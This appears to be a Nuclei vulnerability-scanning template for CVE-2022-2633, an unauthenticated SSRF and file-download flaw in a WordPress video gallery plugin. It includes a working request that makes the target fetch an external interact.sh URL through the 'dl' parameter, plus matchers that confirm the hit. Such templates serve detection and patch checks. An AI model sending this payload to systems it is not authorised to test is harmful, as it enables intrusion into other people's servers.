id: CVE-2022-2633 info: name: All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download & SSRF vulnerability author: theamanrawat description: | Unauthenticated Arbitrary File Download & SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions <= 2.6.0). reference: - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994 - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html - https://wordpress.org/plugins/all-in-one-video-gallery/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2633 - https://nvd.nist.gov/vuln/detail/CVE-2022-2633 classification: cve-id: CVE-2022-2633 metadata: verified: true tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery requests: - raw: - | @timeout: 10s GET /index.php/video/?dl={{base64('http://interact.sh/')}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'Interactsh Server' - type: status status: - 200